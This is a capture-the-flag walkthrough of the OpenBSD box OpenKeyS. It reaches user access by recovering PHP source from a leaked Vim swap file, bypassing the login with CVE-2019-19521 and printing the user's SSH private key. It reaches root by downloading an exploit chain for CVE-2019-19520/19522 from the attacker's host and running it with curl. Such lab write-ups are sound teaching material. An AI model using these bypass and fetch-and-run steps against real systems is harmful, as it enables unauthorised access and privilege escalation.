---
search:
  exclude: true
---

# OpenKeyS Writeup

![](img/59.png)

## Introduction :

OpenKeyS is an Easy (but marked as Medium) OpenBSD box released back in July 2020. Both the foothold and the privilege escalation rest on OpenBSD authentication bugs published by Qualys in December 2019, so fingerprinting the operating system version is what unlocks the whole box.

## **Part 1 : Initial Enumeration**

As always we begin our enumeration using **Nmap**. A first, fast pass over all 65535 ports only lists what is open; we then rescan those ports with the flags **-sC** for default scripts and **-sV** to enumerate versions:

```
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -vvv -p- 10.10.10.199 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -sCV -p22,80 10.10.10.199
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 21:12 CEST
Nmap scan report for 10.10.10.199
Host is up (0.47s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```

A word on the first scan: `--max-retries 0` together with `--min-rate=500` trades accuracy for speed, and on a link with ~470 ms latency it can silently drop ports, so a negative result from that pass is worth re-checking before moving on. The two findings are already telling: **OpenBSD httpd** on port 80, and OpenSSH 8.1, the version that shipped with OpenBSD 6.6 (October 2019). Keep that version in mind.

## **Part 2 : Getting User Access**

Our nmap scan picked up port 80, which serves a simple login page:

![](prg/59_002.png)

Let's enumerate the web service using gobuster:

```
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ gobuster dir -q -t 50 -u http://10.10.10.199 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt
/includes             (Status: 301) [Size: 443] [--> http://10.10.10.199/includes/]
/js                   (Status: 301) [Size: 443] [--> http://10.10.10.199/js/]
/css                  (Status: 301) [Size: 443] [--> http://10.10.10.199/css/]
/images               (Status: 301) [Size: 443] [--> http://10.10.10.199/images/]
/index.php            (Status: 200) [Size: 4837]
/fonts                (Status: 301) [Size: 443] [--> http://10.10.10.199/fonts/]
/.                    (Status: 200) [Size: 96]
```

We found the **/includes** directory, and httpd allows directory listing there, so let's check it from our web browser:

![](prg/59_001.png)

The listing exposes **auth.php.swp**, a Vim swap file. A swap file holds the editor buffer's text inside a thin binary wrapper, so one left behind in a web root leaks the source of a PHP file that the server would otherwise only execute. We download it and look at it:

```
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/includes/auth.php.swp
--2021-06-26 21:20:14--  http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’

auth.php.swp            [ <=>                ]  12.00K  12.8KB/s    in 0.9s

2021-06-26 21:20:16 (12.8 KB/s) - ‘auth.php.swp’ saved [12288]

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat auth.php.swp
3210#! Utp=adniferopenkeys.htb/var/www/htdocs/includes/auth.php @sWB@? mgC v p n m U S 0 J ?>} session_start(); session_destroy(); session_unset();{function close_session()} $_SESSION["username"] = $_REQUEST['username']; $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT']; $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR']; $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME']; $_SESSION["login_time"] = $_SERVER['REQUEST_TIME']; $_SESSION["logged_in"] = True;{function init_session()} } return False; { else } } return True; $_SESSION['last_activity'] = $time; // Session is active, update last activity time and return True { else } return False; close_session(); { ($time - $_SESSION['last_activity']) > $session_timeout) if (isset($_SESSION['last_activity']) && $time = $_SERVER['REQUEST_TIME']; // Has the session expired? { if(isset($_SESSION["logged_in"])) // Is the user logged in? session_start(); // Start the session $session_timeout = 300; // Session timeout in seconds{function is_active_session()} return $retcode; system($cmd, $retcode); $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);{function authenticate($username, $password)<****?php%
```

`file` already reads three useful facts out of the swap header: the editor ran as user **jennifer**, on host **openkeys.htb**, and the file is `/var/www/htdocs/includes/auth.php` (so `/var/www/htdocs` is the web root). The `cat` output looks upside down because Vim stores the lines of a data block from the end of the block backwards; `vim -r auth.php.swp` would recover it cleanly, and simply reading the text bottom-up gives the original file:

```php
<?php
function authenticate($username, $password)
{
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
    system($cmd, $retcode);
    return $retcode;
}

function is_active_session()
{
    // Session timeout in seconds
    $session_timeout = 300;

    // Start the session
    session_start();

    // Is the user logged in?
    if(isset($_SESSION["logged_in"]))
    {
        // Has the session expired?
        $time = $_SERVER['REQUEST_TIME'];
        if (isset($_SESSION['last_activity']) &&
            ($time - $_SESSION['last_activity']) > $session_timeout)
        {
            close_session();
            return False;
        }
        else
        {
            // Session is active, update last activity time and return True
            $_SESSION['last_activity'] = $time;
            return True;
        }
    }
    else
    {
        return False;
    }
}

function init_session()
{
    $_SESSION["logged_in"] = True;
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["username"] = $_REQUEST['username'];
}

function close_session()
{
    session_unset();
    session_destroy();
    session_start();
}
?>
```

Two things in this file matter for the attack. First, `authenticate()` does not check credentials itself: it shells out to `../auth_helpers/check_auth <username> <password>` and trusts the exit code. `escapeshellcmd()` neutralises shell metacharacters, so we cannot chain a second command, but it does nothing about an argument that starts with a dash, so the username is passed through untouched to whatever option parsing happens downstream. Second, `init_session()` records `$_REQUEST['username']` rather than `$_POST['username']`. `$_REQUEST` is merged from GET, POST and (depending on PHP's `request_order`) cookies, and on this box a `username` cookie is honoured and overrides the POST field of the same name, so the username that gets authenticated and the username that gets stored in the session need not be the same.

The swap header also tells us the host name, so we add **openkeys.htb** to our hosts file (we will want it for SSH later), and the command string points at `../auth_helpers/check_auth`, which sits next to the web root and turns out to be served by httpd too, so we download it:

```
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.199 openkeys.htb' >> /etc/hosts

┌──(root💀nowhere)-[~]
└─# ping -c1 openkeys.htb
PING openkeys.htb (10.10.10.199) 56(84) bytes of data.
64 bytes from openkeys.htb (10.10.10.199): icmp_seq=1 ttl=254 time=470 ms

--- openkeys.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 469.674/469.674/469.674/0.000 ms

┌──(root💀nowhere)-[~]
└─# exit

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/auth_helpers/check_auth
--2021-06-26 21:23:30--  http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’

check_auth          100%[===================>]  12.00K  12.8KB/s    in 0.9s

2021-06-26 21:23:32 (12.8 KB/s) - ‘check_auth’ saved [12288/12288]
```

We check what kind of file check_auth is:

```
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ rabin2 -I check_auth
arch     x86
baddr    0x0
binsz    10495
bintype  elf
bits     64
canary   false
retguard false
class    ELF64
compiler Linker: LLD 8.0.1
crypto   false
endian   little
havecode true
intrp    /usr/libexec/ld.so
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  AMD x86-64 architecture
maxopsz  16
minopsz  1
nx       true
os       openbsd
pcalign  0
pic      true
relocs   true
relro    partial
rpath    NONE
sanitiz  false
static   false
stripped false
subsys   openbsd
va       true
```

So `check_auth` is a native OpenBSD binary (interpreter `/usr/libexec/ld.so`, `os openbsd`), not something we can run on our Linux box, and the target itself runs OpenBSD 6.6 as the SSH banner will confirm. The binary's only job is to ask OpenBSD's BSD Auth framework, `auth_userokay(3)`, whether the username/password pair is valid. That is exactly the code path affected by **CVE-2019-19521**, the authentication bypass published by Qualys in December 2019: BSD Auth hands the username to the `login_passwd(8)` helper on its command line, so a username that begins with `-` is parsed as an option. `-schallenge` selects the *challenge* authentication style, and because a plain password login has no challenge to verify, `login_passwd` reports success for any password. OpenBSD 6.6 without the December 2019 errata patches is vulnerable.

Put together with the PHP we recovered, the bypass is: send `-schallenge` as the POSTed `username` (any password) so that `check_auth` returns 0, and add a `username=jennifer` cookie so that `$_REQUEST['username']`, and therefore the session, names the account whose key we actually want. So we intercept the POST request to the index.php login page with Burp Suite:

![](prg/59_003.png)

Obviously if we send it as it is we get an authentication denied error:

![](prg/59_004.png)

With `-schallenge` as the POSTed username and `username=jennifer` in the Cookie header, the login is accepted:

![](prg/59_005.png)

We follow the redirection:

![](prg/59_006.png)

And we get jennifer's SSH private key!
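Going back to the swap file for a moment: rather than reading the reversed `cat` output by eye, or relying on `vim -r` (which needs Vim on hand and a writable directory), a few lines of Python pull the editor metadata and the original line order out of any leaked `.swp`. This is an added example, not part of the original writeup. It assumes the swap file was written by a little-endian 64-bit Vim (the header offsets come from `struct block0` and `struct data_block` in Vim's `memline.c` for that case) and carries a constructed three-page sample so it runs offline; the sample's contents are a stand-in, not the real `auth.php.swp`:

```python
"""Recover the edited text from a leaked Vim swap file.

Added example, not the writeup's own code.  Vim keeps a buffer in 4096-byte
pages: page 0 is the "b0" header (who edited which file), then "tp" pointer
pages and "ad" data pages.  In a data page the lines are NUL-terminated and
packed from the END of the page downwards, line 1 highest, so `cat` prints
the file bottom-up; the page's index array gives the real line order.
Header offsets follow struct block0 / struct data_block in Vim's memline.c
for a little-endian LP64 build (amd64 OpenBSD/Linux); that is an assumption.
"""
import struct
import sys

PAGE_SIZE = 4096                 # Vim's default; also recorded in block0
B0_UNAME, B0_HNAME, B0_FNAME = 28, 68, 108   # field offsets inside block0
# data page header: id "ad", pad, free bytes, txt_start, txt_end, line_count
DATA_HDR = struct.Struct("<H2xIIIQ")
ENTRY = struct.Struct("<I")      # one index entry = offset of a line's text


def _cstr(buf):
    return buf.split(b"\0", 1)[0].decode("utf-8", "replace")


def swap_info(data):
    """The same facts file(1) reports: editor version, pid, user, host, file."""
    if data[:2] != b"b0":
        raise ValueError("not a Vim swap file (no b0 page)")
    return {
        "version": _cstr(data[2:12]),
        "page_size": struct.unpack_from("<I", data, 12)[0] or PAGE_SIZE,
        "pid": struct.unpack_from("<I", data, 24)[0],
        "user": _cstr(data[B0_UNAME:B0_HNAME]),
        "host": _cstr(data[B0_HNAME:B0_FNAME]),
        "file": _cstr(data[B0_FNAME:B0_FNAME + 900]),
    }


def recover_lines(data):
    """Walk every "ad" page and return the buffer's lines in editor order."""
    page = swap_info(data)["page_size"]
    lines, off = [], page            # page 0 is never a data page
    while off + DATA_HDR.size <= len(data):
        if data[off:off + 2] != b"ad":
            off += page
            continue
        _, _free, txt_start, txt_end, count = DATA_HDR.unpack_from(data, off)
        block = data[off:off + txt_end]   # a data block may span several pages
        for i in range(count):
            start = ENTRY.unpack_from(block, DATA_HDR.size + ENTRY.size * i)[0]
            if not txt_start <= start < txt_end:
                raise ValueError("corrupt index entry %d in page %d" % (i, off // page))
            lines.append(block[start:block.index(b"\0", start)].decode("utf-8", "replace"))
        off += max(txt_end, page)
    return lines


def build_swap(lines, user="jennifer", host="openkeys.htb",
               fname="/var/www/htdocs/includes/auth.php"):
    """Constructed sample: lay out b0 + tp + one ad page the way Vim does, so the
    parser can be exercised offline.  Synthetic data, not the real auth.php.swp."""
    b0 = bytearray(PAGE_SIZE)
    b0[0:2], b0[2:12] = b"b0", b"VIM 8.1".ljust(10, b"\0")
    struct.pack_into("<IIII", b0, 12, PAGE_SIZE, 0, 0, 49850)   # page, mtime, ino, pid
    for off, val in ((B0_UNAME, user), (B0_HNAME, host), (B0_FNAME, fname)):
        b0[off:off + len(val)] = val.encode()
    tp = bytearray(PAGE_SIZE)
    tp[0:2] = b"tp"
    ad, index, txt_start = bytearray(PAGE_SIZE), [], PAGE_SIZE
    for line in lines:               # line 1 ends up highest in the page
        text = line.encode() + b"\0"
        txt_start -= len(text)
        ad[txt_start:txt_start + len(text)] = text
        index.append(txt_start)
    hdr_end = DATA_HDR.size + ENTRY.size * len(lines)
    if hdr_end > txt_start:
        raise ValueError("sample does not fit in one page")
    DATA_HDR.pack_into(ad, 0, int.from_bytes(b"ad", "little"),
                       txt_start - hdr_end, txt_start, PAGE_SIZE, len(lines))
    for i, start in enumerate(index):
        ENTRY.pack_into(ad, DATA_HDR.size + ENTRY.size * i, start)
    return bytes(b0 + tp + ad)


SAMPLE = ["<?php", "function authenticate($username, $password)", "{",
          "    system(\"../auth_helpers/check_auth \" . $username, $rc);",
          "    return $rc;", "}", "?>"]   # constructed stand-in for auth.php

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_swap(SAMPLE)
    info = swap_info(blob)
    print("# %(user)s@%(host)s:%(file)s (pid %(pid)s, %(version)s)" % info)
    print("\n".join(recover_lines(blob)))
```

Run it as `python3 vimswap.py auth.php.swp` against the real download; without an argument it parses its own constructed sample. Encrypted swap files (Vim's `:X`) are not handled, and on a 32-bit Vim the `line_count` field is four bytes instead of eight, which shifts the index array by four bytes.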
Now let's save it locally, restrict its permissions (ssh refuses a private key that other users can read) and use it to log in as jennifer:

```
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat pkey
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ chmod 600 pkey

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ ssh -i pkey jennifer@openkeys.htb
The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established.
ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'openkeys.htb,10.10.10.199' (ECDSA) to the list of known hosts.
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

The banner confirms OpenBSD 6.6 (GENERIC kernel built on 12 October 2019, i.e. before the December 2019 authentication errata), and the `id` output is worth a second look: besides her own group, jennifer is in **wheel** (gid 0). On OpenBSD `su(1)` refuses to switch to root for anyone outside wheel, and the S/Key trick used in Part 3 goes through `su`, so this membership is what makes the final step possible from her account.

And that's it!
We managed to log in via SSH as the user jennifer and get the user flag.

## **Part 3 : Getting Root Access**

Now in order to privesc this box let's first enumerate it using linpeas.sh, served from our attacking machine over HTTP:

```
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ cp /home/nothing/HTB/Admirer/linpeas.sh .

[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[terminal 2]
openkeys$ curl http://10.10.14.11:9090/linpeas.sh > /tmp/peas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  333k  100  333k    0     0  66009      0  0:00:05  0:00:05 --:--:-- 80533
openkeys$ chmod +x /tmp/peas.sh
openkeys$ /tmp/peas.sh
```

![](prg/59_007.png)

Let linpeas.sh run a bit; scrolling through the output we stumble upon **xlock**. On OpenBSD `/usr/X11R6/bin/xlock` is installed set-group-ID **auth**, and that is the hint to look up xlock privesc vulnerabilities. We land on the same Qualys advisory as in Part 2, which also covers two local bugs:

- **CVE-2019-19520**: `xlock` loads a Mesa OpenGL driver at runtime, and libGL's "am I running with extra privileges?" check only compared the real and effective *user* IDs, not the group IDs. A set-group-ID program therefore still honours `LIBGL_DRIVERS_PATH`, and an attacker can make `xlock` load a shared library of their choosing with group **auth**.
- **CVE-2019-19522**: group **auth** can write to `/etc/skey/` (and `/var/db/yubikey/`), so if S/Key authentication is enabled a member can drop an S/Key record for root and then authenticate as root with it, for example through `su` with the `skey` style.

[bcoles' `openbsd-authroot`](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) chains the two (note its `CVE-2019-19520 / CVE-2019-19522` banner; CVE-2019-19521, the bypass we used on the web login, plays no part here). It needs S/Key enabled on the target, it starts its own `Xvfb` so that `xlock` has a display to connect to, and it **overwrites existing S/Key records**, hence the five-second warning before it runs. So we upload the privesc script onto the box:

```
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/openkeys]
→ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot -O exploit.sh

[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[terminal 2]
openkeys$ curl http://10.10.14.11:9090/exploit.sh > exploit.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4087  100  4087    0     0   4315      0 --:--:-- --:--:-- --:--:--  4311
openkeys$ file exploit.sh
exploit.sh: Bourne shell script text executable
openkeys$ chmod +x exploit.sh
openkeys$ ./exploit.sh
openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions

WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).

[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# cat /root/root.txt
f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

Reading the output against the two CVEs: the `_XSERVTransmkdir ... euid != 0` line is only Xvfb complaining that it cannot create `/tmp/.X11-unix` as an unprivileged user and is harmless; "we have auth group permissions" is CVE-2019-19520 succeeding; the S/Key step then writes root's record and calls `su`, whose challenge is the `otp-md5 99 obsd91335` line, and the six-word one-time password the script printed is the answer we type at the `S/Key Password:` prompt. That `su` step is where jennifer's wheel membership from Part 2 matters.

And that's it! We managed to privesc to the root user and print the root flag.

## **Conclusion**

Here we can see the progress graph :

![](img/59_graph.png)